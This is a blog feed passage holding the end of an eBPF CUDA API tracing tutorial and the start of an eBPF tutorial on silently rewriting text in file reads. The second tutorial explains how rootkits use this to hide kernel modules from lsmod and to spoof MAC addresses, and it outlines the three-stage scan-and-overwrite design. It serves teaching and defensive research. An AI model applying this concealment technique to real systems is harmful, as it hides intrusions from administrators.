           &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;is_return&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="s"&gt;"[EXIT]"&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s"&gt;"[ENTER]"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
           &lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This function formats and displays event information, including timestamps, process details, event type, and specific parameters or return values.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;get_event_details&lt;/code&gt; function converts raw event data into human-readable form:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;get_event_details&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;size_t&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;switch&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="n"&gt;CUDA_EVENT_MALLOC&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;is_return&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;snprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"size=%zu bytes"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;mem&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;size&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;else&lt;/span&gt;
            &lt;span class="n"&gt;snprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;details&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"returned=%s"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cuda_error_str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;ret_val&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
        &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Similar cases for other event types... */&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This function handles each event type differently. For example, a malloc event shows the requested size on entry and the error code on exit.&lt;/p&gt;

&lt;p&gt;The main event loop is remarkably simple:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;exiting&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ring_buffer__poll&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rb&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt; &lt;span class="cm"&gt;/* timeout, ms */&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="cm"&gt;/* Error handling... */&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



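&lt;p&gt;This polls the ring buffer for events, calling &lt;code&gt;handle_event&lt;/code&gt; for each one. The 100 ms timeout bounds how long each poll can block, so the loop rechecks the &lt;code&gt;exiting&lt;/code&gt; flag regularly and the program stays responsive to signals like Ctrl+C.&lt;/p&gt;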
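
&lt;p&gt;The &lt;code&gt;exiting&lt;/code&gt; flag checked by the loop is not shown in the excerpt. One common way to set it, sketched here as an assumption rather than as the tool's actual code, is a signal handler installed with &lt;code&gt;sigaction&lt;/code&gt;. The helper name &lt;code&gt;install_signal_handlers&lt;/code&gt; is hypothetical.&lt;/p&gt;

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stddef.h>

/* Flag checked by the polling loop; sig_atomic_t can be written safely
 * from inside a signal handler. */
static volatile sig_atomic_t exiting = 0;

static void sig_handler(int sig)
{
    (void)sig;   /* the signal number is not needed here */
    exiting = 1;
}

/* Hypothetical helper: install the handler for Ctrl+C (SIGINT) and for
 * SIGTERM. Returns 0 on success, -1 if sigaction() fails. */
static int install_signal_handlers(void)
{
    struct sigaction sa = { 0 };

    sa.sa_handler = sig_handler;
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGINT, &sa, NULL) != 0)
        return -1;
    if (sigaction(SIGTERM, &sa, NULL) != 0)
        return -1;
    return 0;
}
```

&lt;p&gt;With this in place, pressing Ctrl+C only sets the flag; the loop exits after the current poll returns, so cleanup code after the loop still runs.&lt;/p&gt;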

&lt;h2&gt;
  
  
  CUDA Error Handling and Reporting
&lt;/h2&gt;

&lt;p&gt;An important aspect of our tracer is translating CUDA error codes into human-readable messages. CUDA has over 100 different error codes, from simple ones like "out of memory" to complex ones like "unsupported PTX version."&lt;/p&gt;

&lt;p&gt;Our tool includes a comprehensive &lt;code&gt;cuda_error_str&lt;/code&gt; function that maps these numeric codes to string descriptions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="nf"&gt;cuda_error_str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;switch&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s"&gt;"Success"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s"&gt;"InvalidValue"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;case&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s"&gt;"OutOfMemory"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="cm"&gt;/* Many more error codes... */&lt;/span&gt;
    &lt;span class="nl"&gt;default:&lt;/span&gt; &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="s"&gt;"Unknown"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This makes the output much more useful for debugging. Instead of seeing "error 2", you'll see "OutOfMemory", which immediately tells you what went wrong.&lt;/p&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Building the tracer is straightforward with the provided Makefile:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Build both the tracer and the example&lt;/span&gt;
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This creates two binaries:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;cuda_events&lt;/code&gt;: The eBPF-based CUDA tracing tool&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;basic02&lt;/code&gt;: A simple CUDA example application&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The build system is smart enough to detect your GPU architecture using &lt;code&gt;nvidia-smi&lt;/code&gt; and compile the CUDA code with the appropriate flags.&lt;/p&gt;

&lt;p&gt;Running the tracer is just as easy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Start the tracing tool&lt;/span&gt;
&lt;span class="nb"&gt;sudo&lt;/span&gt; ./cuda_events &lt;span class="nt"&gt;-p&lt;/span&gt; ./basic02

&lt;span class="c"&gt;# In another terminal, run the CUDA example&lt;/span&gt;
./basic02
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can also trace a specific process by PID:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Run the CUDA example&lt;/span&gt;
./basic02 &amp;amp;
&lt;span class="nv"&gt;PID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;$!&lt;/span&gt;

&lt;span class="c"&gt;# Start the tracing tool with PID filtering&lt;/span&gt;
&lt;span class="nb"&gt;sudo&lt;/span&gt; ./cuda_events &lt;span class="nt"&gt;-p&lt;/span&gt; ./basic02 &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nv"&gt;$PID&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The example output shows detailed information about each CUDA operation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Using CUDA library: ./basic02
TIME     PROCESS          PID     EVENT                 TYPE    DETAILS
17:35:41 basic02          12345   cudaMalloc          [ENTER]  size=4000 bytes
17:35:41 basic02          12345   cudaMalloc           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaMalloc          [ENTER]  size=4000 bytes
17:35:41 basic02          12345   cudaMalloc           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaMemcpy          [ENTER]  size=4000 bytes, kind=1
17:35:41 basic02          12345   cudaMemcpy           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaLaunchKernel    [ENTER]  func=0x7f1234567890
17:35:41 basic02          12345   cudaLaunchKernel     [EXIT]  returned=Success
17:35:41 basic02          12345   cudaMemcpy          [ENTER]  size=4000 bytes, kind=2
17:35:41 basic02          12345   cudaMemcpy           [EXIT]  returned=Success
17:35:41 basic02          12345   cudaFree            [ENTER]  ptr=0x7f1234568000
17:35:41 basic02          12345   cudaFree             [EXIT]  returned=Success
17:35:41 basic02          12345   cudaFree            [ENTER]  ptr=0x7f1234569000
17:35:41 basic02          12345   cudaFree             [EXIT]  returned=Success
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This output shows the typical flow of a CUDA application:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Allocate memory on the device&lt;/li&gt;
&lt;li&gt;Copy data from host to device (kind=1)&lt;/li&gt;
&lt;li&gt;Launch a kernel to process the data&lt;/li&gt;
&lt;li&gt;Copy results back from device to host (kind=2)&lt;/li&gt;
&lt;li&gt;Free device memory&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Benchmark
&lt;/h2&gt;

&lt;p&gt;We also provide a benchmark tool that measures the overhead of the tracer and the latency of the CUDA API calls:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;make
&lt;span class="nb"&gt;sudo&lt;/span&gt; ./cuda_events &lt;span class="nt"&gt;-p&lt;/span&gt; ./bench
./bench
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Without tracing, the benchmark reports:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Data size: 1048576 bytes (1024 KB)
Iterations: 10000

Summary (average time per operation):
-----------------------------------
cudaMalloc:           113.14 µs
cudaMemcpyH2D:        365.85 µs
cudaLaunchKernel:       7.82 µs
cudaMemcpyD2H:        393.55 µs
cudaFree:               0.00 µs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;With the tracer attached, the benchmark reports:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Data size: 1048576 bytes (1024 KB)
Iterations: 10000

Summary (average time per operation):
-----------------------------------
cudaMalloc:           119.81 µs
cudaMemcpyH2D:        367.16 µs
cudaLaunchKernel:       8.77 µs
cudaMemcpyD2H:        383.66 µs
cudaFree:               0.00 µs
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



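&lt;p&gt;In these runs the tracer adds on the order of a few microseconds to each CUDA API call: &lt;code&gt;cudaMalloc&lt;/code&gt; goes from 113.14 µs to 119.81 µs and &lt;code&gt;cudaLaunchKernel&lt;/code&gt; from 7.82 µs to 8.77 µs, while &lt;code&gt;cudaMemcpyD2H&lt;/code&gt; even measured slightly faster with tracing, which suggests that part of the difference is run-to-run noise. This overhead is negligible for most cases. To reduce it further, you can try using the &lt;a href="https://github.com/eunomia-bpf/bpftime" rel="noopener noreferrer"&gt;bpftime&lt;/a&gt; userspace runtime to optimize the eBPF program.&lt;/p&gt;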
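
&lt;p&gt;To make the comparison concrete, the per-operation difference can be computed directly from the two summaries above. The following is only an illustrative sketch: the struct and function names are hypothetical, and the numbers are copied from the benchmark outputs shown in this section.&lt;/p&gt;

```c
#include <stdio.h>

/* Average latencies in microseconds, copied from the two benchmark
 * summaries above (baseline first, then with the tracer attached). */
struct bench_row {
    const char *op;
    double baseline_us;
    double traced_us;
};

static const struct bench_row rows[] = {
    { "cudaMalloc",       113.14, 119.81 },
    { "cudaMemcpyH2D",    365.85, 367.16 },
    { "cudaLaunchKernel",   7.82,   8.77 },
    { "cudaMemcpyD2H",    393.55, 383.66 },
    { "cudaFree",           0.00,   0.00 },
};

/* Difference between the traced and the baseline run for one row. */
static double overhead_us(const struct bench_row *r)
{
    return r->traced_us - r->baseline_us;
}

/* Print the signed difference for every operation. */
static void print_overhead(void)
{
    for (size_t i = 0; i < sizeof(rows) / sizeof(rows[0]); i++)
        printf("%-18s %+7.2f us\n", rows[i].op, overhead_us(&rows[i]));
}
```

&lt;p&gt;A negative value, as for &lt;code&gt;cudaMemcpyD2H&lt;/code&gt;, does not mean tracing speeds anything up. It indicates that the variation between runs is larger than the probe cost for that operation, so repeating the benchmark several times gives a more reliable estimate.&lt;/p&gt;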

&lt;h2&gt;
  
  
  Command Line Options
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;cuda_events&lt;/code&gt; tool supports these options:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;-v&lt;/code&gt;: Enable verbose output for debugging&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-t&lt;/code&gt;: Don't print timestamps&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-r&lt;/code&gt;: Don't show function returns (only show function entries)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-p PATH&lt;/code&gt;: Specify the path to the CUDA runtime library or application&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;-d PID&lt;/code&gt;: Trace only the specified process ID&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Next Steps
&lt;/h2&gt;

&lt;p&gt;Once you're comfortable with this basic CUDA tracing tool, you could extend it to:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Add support for more CUDA API functions&lt;/li&gt;
&lt;li&gt;Add timing information to analyze performance bottlenecks&lt;/li&gt;
&lt;li&gt;Implement correlation between related operations (e.g., matching mallocs with frees)&lt;/li&gt;
&lt;li&gt;Create visualizations of CUDA operations for easier analysis&lt;/li&gt;
&lt;li&gt;Add support for other GPU frameworks like OpenCL or ROCm&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;For more details about the CUDA example and tutorial, check out our repo and its code at &lt;a href="https://github.com/eunomia-bpf/basic-cuda-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/basic-cuda-tutorial&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The code for this tutorial is available at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/47-cuda-events" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/47-cuda-events&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;CUDA Programming Guide: &lt;a href="https://docs.nvidia.com/cuda/cuda-c-programming-guide/" rel="noopener noreferrer"&gt;https://docs.nvidia.com/cuda/cuda-c-programming-guide/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;NVIDIA CUDA Runtime API: &lt;a href="https://docs.nvidia.com/cuda/cuda-runtime-api/" rel="noopener noreferrer"&gt;https://docs.nvidia.com/cuda/cuda-runtime-api/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;libbpf Documentation: &lt;a href="https://libbpf.readthedocs.io/" rel="noopener noreferrer"&gt;https://libbpf.readthedocs.io/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Linux uprobes Documentation: &lt;a href="https://www.kernel.org/doc/Documentation/trace/uprobetracer.txt" rel="noopener noreferrer"&gt;https://www.kernel.org/doc/Documentation/trace/uprobetracer.txt&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;eGPU: eBPF on GPUs: &lt;a href="https://dl.acm.org/doi/10.1145/3723851.3726984" rel="noopener noreferrer"&gt;https://dl.acm.org/doi/10.1145/3723851.3726984&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;bpftime GPU Examples: &lt;a href="https://github.com/eunomia-bpf/bpftime/tree/master/example/gpu" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpftime/tree/master/example/gpu&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>ebpf</category>
      <category>cuda</category>
      <category>gpu</category>
    </item>
    <item>
      <title>eBPF Tutorial: Transparent Text Replacement in File Reads</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 23 Dec 2025 07:17:34 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-transparent-text-replacement-in-file-reads-3fm7</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-transparent-text-replacement-in-file-reads-3fm7</guid>
      <description>&lt;p&gt;When you read a file in Linux, you trust that what you see matches what's stored on disk. But what if the kernel itself was lying to you? This tutorial demonstrates how eBPF programs can intercept file read operations and silently replace text before applications ever see it—creating a powerful capability for both defensive security monitoring and offensive rootkit techniques.&lt;/p&gt;

&lt;p&gt;Unlike traditional file modification that leaves traces in timestamps and audit logs, this approach manipulates data in-flight during the read system call. The file on disk remains untouched, yet every program reading it sees modified content. This technique has legitimate uses in security research, honeypot deployment, and anti-malware deception, but also reveals how rootkits can hide their presence from system administrators.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/27-replace" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/27-replace&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Use Cases: From Security to Deception
&lt;/h2&gt;

&lt;p&gt;Text replacement in file reads serves several purposes across the security spectrum. For defenders, it enables honeypot systems that present fake credentials to attackers, or deception layers that make malware believe it's succeeded when it hasn't. Security researchers use it to study malware behavior by feeding controlled data to suspicious processes.&lt;/p&gt;

&lt;p&gt;On the offensive side, rootkits use this exact technique to hide their presence. The classic example is hiding kernel modules from &lt;code&gt;lsmod&lt;/code&gt; by replacing their names in &lt;code&gt;/proc/modules&lt;/code&gt; with whitespace or other module names. Malware can spoof MAC addresses by modifying reads from &lt;code&gt;/sys/class/net/*/address&lt;/code&gt;, defeating sandbox detection that looks for virtual machine identifiers.&lt;/p&gt;

&lt;p&gt;The key insight is that this operates at the system call boundary—after the kernel reads the file but before the userspace process sees the data. No matter how many times you &lt;code&gt;cat&lt;/code&gt; the file or open it in different editors, you'll always see the modified version, because the eBPF program intercepts every read operation.&lt;/p&gt;

&lt;h2&gt;
  
  
  Architecture: Multi-Stage Text Scanning and Replacement
&lt;/h2&gt;

&lt;p&gt;This implementation is more sophisticated than simple string replacement. The challenge is working within eBPF's constraints: limited stack size, no unbounded loops, and strict verifier checks. To handle arbitrarily large files and multiple matches, the program uses a three-stage approach with tail calls to chain eBPF programs together.&lt;/p&gt;

&lt;p&gt;The first stage (&lt;code&gt;find_possible_addrs&lt;/code&gt;) scans through the read buffer looking for characters that match the first character of our search string. It can't do full string matching yet due to complexity limits, so it just marks potential locations. These addresses are stored in &lt;code&gt;map_name_addrs&lt;/code&gt; for the next stage.&lt;/p&gt;
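
&lt;p&gt;The idea behind the first-stage scan can be illustrated outside the kernel. The following is a minimal userspace sketch in plain C, not the tutorial's eBPF code: &lt;code&gt;find_candidates&lt;/code&gt; and its parameters are hypothetical names, and the fixed-capacity output array stands in for &lt;code&gt;map_name_addrs&lt;/code&gt;. It records every offset whose byte equals the first character of the search string and stops once the array is full.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;#include &amp;lt;stddef.h&amp;gt;

/*
 * Stage 1 sketch: record every offset in buf whose byte equals the first
 * byte of the search string. Writes at most out_cap offsets to out and
 * returns how many were written.
 */
size_t find_candidates(const char *buf, size_t buf_len, char first,
                       size_t *out, size_t out_cap)
{
    size_t found = 0;

    for (size_t i = 0; i &amp;lt; buf_len &amp;amp;&amp;amp; found &amp;lt; out_cap; i++) {
        if (buf[i] == first)
            out[found++] = i;
    }
    return found;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;For the buffer &lt;code&gt;abcabca&lt;/code&gt; and the first character &lt;code&gt;a&lt;/code&gt;, this records offsets 0, 3, and 6. The capacity check mirrors the constraint that a bounded map can only hold a fixed number of candidates per read.&lt;/p&gt;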

&lt;p&gt;The second stage (&lt;code&gt;check_possible_addresses&lt;/code&gt;) is tail-called from the first. It examines each potential match location and performs full string comparison using &lt;code&gt;bpf_strncmp&lt;/code&gt;. This verifies whether we actually found our target text. Confirmed matches go into &lt;code&gt;map_to_replace_addrs&lt;/code&gt;.&lt;/p&gt;
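
&lt;p&gt;The confirmation step can be sketched in userspace as well. This is an illustration under stated assumptions, not the tutorial's eBPF code: &lt;code&gt;confirm_candidates&lt;/code&gt; is a hypothetical name, candidates are represented as offsets into the buffer, and the standard &lt;code&gt;memcmp&lt;/code&gt; is swapped in for &lt;code&gt;bpf_strncmp&lt;/code&gt;. The output array plays the role of &lt;code&gt;map_to_replace_addrs&lt;/code&gt; and must have room for every candidate.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;#include &amp;lt;stddef.h&amp;gt;
#include &amp;lt;string.h&amp;gt;

/*
 * Stage 2 sketch: keep only the candidate offsets where the full search
 * string (needle) matches. out must have room for n_cand entries.
 * Returns the number of confirmed offsets written to out.
 */
size_t confirm_candidates(const char *buf, size_t buf_len,
                          const size_t *cand, size_t n_cand,
                          const char *needle, size_t needle_len,
                          size_t *out)
{
    size_t confirmed = 0;

    for (size_t i = 0; i &amp;lt; n_cand; i++) {
        size_t off = cand[i];

        /* Skip candidates where the needle would run past the buffer end. */
        if (off &amp;gt; buf_len || needle_len &amp;gt; buf_len - off)
            continue;
        if (memcmp(buf + off, needle, needle_len) == 0)
            out[confirmed++] = off;
    }
    return confirmed;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;With the buffer &lt;code&gt;foo bar fox&lt;/code&gt;, the search string &lt;code&gt;fox&lt;/code&gt;, and candidates at offsets 0, 8, and 10, only offset 8 is confirmed: offset 0 fails the comparison and offset 10 is too close to the end of the buffer.&lt;/p&gt;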

&lt;p&gt;The third stage (&lt;code&gt;overwrite_addresses&lt;/code&gt;) loops through confirmed match locations and uses &lt;code&gt;bpf_probe_write_user&lt;/code&gt; to overwrite the text with the replacement string. Because both strings must be the same length (to avoid shifting memory and corrupting the buffer), users must pad their replacement text to match.&lt;/p&gt;
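
&lt;p&gt;The equal-length requirement is easy to see in a small userspace sketch. The code below is an illustration, not the tutorial's eBPF code: &lt;code&gt;pad_replacement&lt;/code&gt; and &lt;code&gt;overwrite_matches&lt;/code&gt; are hypothetical helpers, the pad character is an arbitrary choice, and a plain &lt;code&gt;memcpy&lt;/code&gt; stands in for &lt;code&gt;bpf_probe_write_user&lt;/code&gt;. Because the replacement is padded to the length of the search string, every overwrite stays inside the bytes of the original match and nothing after it has to move.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;#include &amp;lt;stddef.h&amp;gt;
#include &amp;lt;string.h&amp;gt;

/*
 * Pad replacement with pad bytes to exactly find_len bytes in out.
 * No NUL terminator is written. Returns 0 on success, or -1 if the
 * replacement is longer than the text it replaces.
 */
int pad_replacement(const char *replacement, size_t find_len,
                    char pad, char *out)
{
    size_t rep_len = strlen(replacement);

    if (rep_len &amp;gt; find_len)
        return -1;
    memcpy(out, replacement, rep_len);
    memset(out + rep_len, pad, find_len - rep_len);
    return 0;
}

/* Stage 3 sketch: overwrite each confirmed offset with the padded text. */
void overwrite_matches(char *buf, size_t buf_len,
                       const size_t *offs, size_t n_offs,
                       const char *padded, size_t len)
{
    for (size_t i = 0; i &amp;lt; n_offs; i++) {
        /* Never write past the end of the buffer. */
        if (offs[i] &amp;gt; buf_len || len &amp;gt; buf_len - offs[i])
            continue;
        memcpy(buf + offs[i], padded, len);
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Replacing the six-byte string &lt;code&gt;secret&lt;/code&gt; with &lt;code&gt;abc&lt;/code&gt; padded by three spaces leaves the buffer length and every later byte position unchanged. A replacement longer than the search string is rejected instead of being truncated.&lt;/p&gt;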

